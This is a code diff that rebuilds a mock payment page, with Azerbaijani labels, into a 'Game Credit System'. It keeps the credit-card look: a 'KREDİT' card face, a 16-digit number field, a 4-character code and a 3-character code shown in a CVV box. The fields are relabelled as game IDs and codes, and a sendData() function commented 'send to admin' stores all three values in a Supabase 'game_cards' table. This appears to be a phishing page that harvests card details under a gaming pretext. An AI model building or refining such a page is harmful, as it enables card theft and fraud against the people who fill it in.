--- a/index.html
+++ b/index.html
@@ -3,7 +3,9 @@
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>Luxury Payment UI</title>
+<title>Game Credit System</title>
+
+<script src="https://cdn.jsdelivr.net/npm/@supabase/supabase-js@2"></script>
 
 <style>
 body{
@@ -12,16 +14,26 @@ body{
   display:flex;
   justify-content:center;
   align-items:center;
-  background:#0c0f14;
+  background:linear-gradient(135deg,#141e30,#243b55);
   font-family:Arial;
-  overflow:hidden;
 }
 
-.container{ width:380px; }
+.phone{
+  width:390px;
+  height:780px;
+  background:#000;
+  border-radius:40px;
+  padding:25px;
+  box-sizing:border-box;
+  box-shadow:0 0 40px rgba(0,0,0,0.8);
+  display:flex;
+  flex-direction:column;
+  justify-content:center;
+}
 
 .card{
   width:100%;
-  height:230px;
+  height:220px;
   perspective:1200px;
   margin-bottom:30px;
   position:relative;
@@ -30,12 +42,14 @@ body{
 .card-inner{
   width:100%;
   height:100%;
-  position:relative;
-  transform-style:preserve-3d;
   transition:transform 0.6s;
+  transform-style:preserve-3d;
+  position:relative;
 }
 
-.card.flip .card-inner{ transform:rotateY(180deg); }
+.card.flip .card-inner{
+  transform:rotateY(180deg);
+}
 
 .card-front,.card-back{
   position:absolute;
@@ -49,9 +63,9 @@ body{
   overflow:hidden;
   background:linear-gradient(145deg,#1f2937,#111827);
   border:1px solid rgba(255,255,255,0.15);
+  box-shadow:0 0 25px rgba(0,255,255,0.4);
 }
 
-/* HOLOGRAM OVERLAY */
 .card-front::before{
   content:"";
   position:absolute;
@@ -61,38 +75,25 @@ body{
     rgba(0,255,255,0.2),
     rgba(255,255,0,0.2));
   mix-blend-mode:overlay;
-  animation:holoMove 6s linear infinite;
+  animation:holo 6s linear infinite;
 }
 
-@keyframes holoMove{
-  0%{ transform:translateX(-100%); }
-  100%{ transform:translateX(100%); }
+@keyframes holo{
+  0%{transform:translateX(-100%)}
+  100%{transform:translateX(100%)}
 }
 
-/* LIGHT REFLECTION */
-.card-front::after{
-  content:"";
+.card-back{
+  transform:rotateY(180deg);
+}
+
+.card-type{
   position:absolute;
-  top:-50%;
-  left:-50%;
-  width:200%;
-  height:200%;
-  background:linear-gradient(
-    60deg,
-    transparent 40%,
-    rgba(255,255,255,0.3) 50%,
-    transparent 60%
-  );
-  transform:rotate(25deg);
-  animation:lightSweep 4s infinite;
+  top:20px;
+  right:25px;
+  font-weight:bold;
+  letter-spacing:2px;
 }
-
-@keyframes lightSweep{
-  0%{ transform:translateX(-100%) rotate(25deg); }
-  100%{ transform:translateX(100%) rotate(25deg); }
-}
-
-.card-back{ transform:rotateY(180deg); }
 
 .card-number{
   font-size:22px;
@@ -100,17 +101,19 @@ body{
   margin-top:80px;
 }
 
-.card-name,.card-expiry{
+.card-bottom{
+  display:flex;
+  justify-content:space-between;
+  margin-top:20px;
   font-size:14px;
-  margin-top:15px;
 }
 
 .cvv-box{
   background:white;
   color:black;
-  padding:6px;
+  padding:8px;
   margin-top:100px;
-  border-radius:6px;
+  border-radius:8px;
   text-align:right;
 }
 
@@ -129,136 +132,94 @@ button{
   padding:14px;
   border-radius:14px;
   border:none;
-  background:black;
+  background:linear-gradient(45deg,#00f2fe,#4facfe);
   color:white;
-  font-size:16px;
   font-weight:bold;
   cursor:pointer;
-  position:relative;
-  overflow:hidden;
-}
-
-/* SUCCESS OVERLAY */
-.success-screen{
-  position:fixed;
-  inset:0;
-  background:black;
-  display:flex;
-  justify-content:center;
-  align-items:center;
-  flex-direction:column;
-  color:white;
-  font-size:20px;
-  opacity:0;
-  pointer-events:none;
-  transition:0.5s;
-}
-
-.success-screen.active{
-  opacity:1;
-  pointer-events:auto;
-}
-
-.checkmark{
-  width:100px;
-  height:100px;
-  border-radius:50%;
-  border:4px solid #00ff99;
-  display:flex;
-  justify-content:center;
-  align-items:center;
-  font-size:50px;
-  margin-bottom:20px;
-  animation:pop 0.5s ease forwards;
-}
-
-@keyframes pop{
-  from{ transform:scale(0); }
-  to{ transform:scale(1); }
 }
 </style>
 </head>
 
 <body>
 
-<div class="container">
+<div class="phone">
 
 <div class="card" id="card">
 <div class="card-inner" id="cardInner">
 
 <div class="card-front">
-<div class="card-number" id="cardNumberDisplay">#### #### #### ####</div>
-<div class="card-name" id="cardNameDisplay">AD SOYAD</div>
-<div class="card-expiry" id="cardExpiryDisplay">MM/YY</div>
+<div class="card-type">KREDİT</div>
+<div class="card-number" id="displayNumber">#### #### #### ####</div>
+<div class="card-bottom">
+<div id="display4">0000</div>
+<div>GAME</div>
+</div>
 </div>
 
 <div class="card-back">
-<div class="cvv-box" id="cardCvvDisplay">###</div>
+<div class="cvv-box" id="display3">000</div>
 </div>
 
 </div>
 </div>
 
-<input type="text" id="cardNumber" placeholder="Kart nömrəsi">
-<input type="text" id="cardName" placeholder="Ad Soyad">
-<input type="text" id="cardExpiry" placeholder="MM/YY" maxlength="5">
-<input type="text" id="cardCvv" placeholder="CVV" maxlength="3">
+<input type="text" id="cardNumber" placeholder="16 simvol ID">
+<input type="text" id="code4" placeholder="4 simvol">
+<input type="text" id="code3" placeholder="3 simvol">
 
-<button onclick="pay()">Pay</button>
+<button onclick="sendData()">Oyuna Başla</button>
 
-</div>
-
-<div class="success-screen" id="successScreen">
-<div class="checkmark">✓</div>
-Payment Successful
 </div>
 
 <script>
+const supabase = window.supabase.createClient(
+"SUPABASE_URL",
+"SUPABASE_ANON_KEY"
+);
+
 const card=document.getElementById("card");
 const cardInner=document.getElementById("cardInner");
 
 const numberInput=document.getElementById("cardNumber");
-const nameInput=document.getElementById("cardName");
-const expiryInput=document.getElementById("cardExpiry");
-const cvvInput=document.getElementById("cardCvv");
+const code4Input=document.getElementById("code4");
+const code3Input=document.getElementById("code3");
 
-const numberDisplay=document.getElementById("cardNumberDisplay");
-const nameDisplay=document.getElementById("cardNameDisplay");
-const expiryDisplay=document.getElementById("cardExpiryDisplay");
-const cvvDisplay=document.getElementById("cardCvvDisplay");
+const displayNumber=document.getElementById("displayNumber");
+const display4=document.getElementById("display4");
+const display3=document.getElementById("display3");
 
-numberInput.addEventListener("input",e=>{
-  let raw=e.target.value.replace(/\D/g,"");
+/* 16 SIMVOL LIMIT + 4-4-4-4 */
+numberInput.addEventListener("input",function(e){
+  let raw=e.target.value.replace(/\s/g,"").slice(0,16);
   let formatted=raw.replace(/(.{4})/g,"$1 ").trim();
   e.target.value=formatted;
-  numberDisplay.textContent=formatted||"#### #### #### ####";
+  displayNumber.textContent=formatted||"#### #### #### ####";
 });
 
-nameInput.addEventListener("input",e=>{
-  nameDisplay.textContent=e.target.value.toUpperCase()||"AD SOYAD";
-});
-
-expiryInput.addEventListener("input",e=>{
-  let v=e.target.value.replace(/\D/g,"");
-  if(v.length>=3) v=v.slice(0,2)+"/"+v.slice(2,4);
+/* 4 SIMVOL */
+code4Input.addEventListener("input",e=>{
+  let v=e.target.value.slice(0,4);
   e.target.value=v;
-  expiryDisplay.textContent=v||"MM/YY";
+  display4.textContent=v||"0000";
 });
 
-cvvInput.addEventListener("input",e=>{
-  cvvDisplay.textContent=e.target.value||"###";
+/* 3 SIMVOL + FLIP */
+code3Input.addEventListener("input",e=>{
+  let v=e.target.value.slice(0,3);
+  e.target.value=v;
+  display3.textContent=v||"000";
 });
 
-cvvInput.addEventListener("focus",()=>card.classList.add("flip"));
-cvvInput.addEventListener("blur",()=>card.classList.remove("flip"));
+code3Input.addEventListener("focus",()=>card.classList.add("flip"));
+code3Input.addEventListener("blur",()=>card.classList.remove("flip"));
 
 /* 3D TILT */
 card.addEventListener("mousemove",(e)=>{
   const rect=card.getBoundingClientRect();
   const x=e.clientX-rect.left;
   const y=e.clientY-rect.top;
-  const rotateY=((x/rect.width)-0.5)*20;
-  const rotateX=((y/rect.height)-0.5)*-20;
+  const rotateY=((x/rect.width)-0.5)*15;
+  const rotateX=((y/rect.height)-0.5)*-15;
   cardInner.style.transform=
   `rotateY(${rotateY}deg) rotateX(${rotateX}deg)`;
 });
@@ -266,12 +227,14 @@ card.addEventListener("mouseleave",()=>{
   cardInner.style.transform="rotateY(0) rotateX(0)";
 });
 
-/* FAKE PAYMENT SUCCESS */
-function pay(){
-  document.querySelector("button").innerText="Processing...";
-  setTimeout(()=>{
-    document.getElementById("successScreen").classList.add("active");
-  },1500);
+/* ADMINƏ GÖNDƏRMƏ */
+async function sendData(){
+  await supabase.from("game_cards").insert([{
+    card_id:numberInput.value,
+    code_4:code4Input.value,
+    code_3:code3Input.value
+  }]);
+  alert("Oyuna giriş edildi");
 }
 </script>
 
